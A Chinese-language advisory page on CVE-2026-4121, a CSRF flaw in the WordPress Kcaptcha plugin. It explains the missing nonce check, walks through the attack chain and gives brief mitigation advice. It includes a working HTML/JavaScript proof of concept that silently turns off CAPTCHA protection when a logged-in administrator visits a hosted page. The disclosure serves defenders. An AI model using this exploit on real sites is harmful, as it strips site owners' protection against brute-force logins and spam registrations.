CVE-2026-4121 CVSS 4.3 中危

CVE-2026-4121 WordPress Kcaptcha插件CSRF漏洞

披露日期: 2026-04-22

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4121

漏洞类型

跨站请求伪造（CSRF）

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WordPress Kcaptcha plugin

漏洞概述

WordPress Kcaptcha插件在1.0.1及之前版本中存在跨站请求伪造（CSRF）漏洞。由于`admin/setting.php`文件缺少nonce验证机制，未经身份验证的攻击者可诱骗站点管理员点击恶意链接，进而修改插件的验证码设置（如禁用登录、注册等表单的验证码保护）。这使得攻击者能够间接绕过网站的安全验证机制，降低网站安全性。

技术细节

该漏洞的核心原因在于插件设置页面的处理逻辑中缺乏CSRF防护。在`admin/setting.php`文件中，表单生成时未使用`wp_nonce_field()`添加安全令牌，且在处理表单提交并调用`$wpdb->update()`更新数据库之前，未调用`wp_verify_nonce()`或`check_admin_referer()`验证请求来源的合法性。攻击者可构建包含恶意参数的HTML页面或链接，诱导已登录的管理员访问。一旦管理员访问，浏览器将携带其会话Cookie自动向服务器发送POST请求。由于服务器无法区分请求是否由用户主动发起，将直接执行修改设置的操作，导致验证码功能被篡改。

攻击链分析

STEP 1

1. 漏洞识别

攻击者分析Kcaptcha插件代码，发现`admin/setting.php`在处理设置更新时未进行nonce验证。

STEP 2

2. 构造恶意请求

攻击者构造一个HTML页面，包含自动提交的表单或AJAX请求，目标指向插件设置接口，参数设置为禁用验证码（如kcaptcha_login=0）。

STEP 3

3. 社会工程学诱导

攻击者通过邮件或即时通讯工具将包含恶意代码的链接发送给WordPress网站管理员。

STEP 4

4. 请求执行

管理员在保持登录状态的情况下点击链接，浏览器自动携带管理员的Session Cookie向服务器发送伪造的请求。

STEP 5

5. 影响达成

服务器接收并处理该请求，更新数据库中的插件设置，导致验证码功能被关闭，网站面临暴力破解或垃圾注册风险。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!--
  PoC for CVE-2026-4121
  Description: This HTML page attempts to disable CAPTCHA settings on the target WordPress site via CSRF.
  Usage: Host this file and trick the admin into visiting it while logged in.
-->
<html>
  <body>
    <script>
      // Target settings page for the Kcaptcha plugin
      // Adjust the URL path if the plugin admin page is located differently
      var targetUrl = "http://target-site/wp-admin/admin.php?page=kcaptcha_settings";
      // If direct access is used: "http://target-site/wp-content/plugins/kcaptcha/admin/setting.php"

      // Parameters to disable CAPTCHA on login, registration, etc.
      var params = "kcaptcha_login=0&kcaptcha_registration=0&kcaptcha_comments=0&kcaptcha_lostpassword=0&action=update";

      // Send POST request
      var xhr = new XMLHttpRequest();
      xhr.open("POST", targetUrl, true);
      xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
      xhr.withCredentials = true;
      xhr.send(params);

      // Optional: Notify attacker
      xhr.onreadystatechange = function() {
        if (xhr.readyState == 4) {
          console.log("Request sent");
        }
      };
    </script>
  </body>
</html>

影响范围

WordPress Kcaptcha plugin <= 1.0.1

防御指南

临时缓解措施

建议暂时禁用Kcaptcha插件，直到官方发布修复补丁。管理员应检查后台设置，确保验证码功能处于启用状态，并提高对钓鱼链接的警惕。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表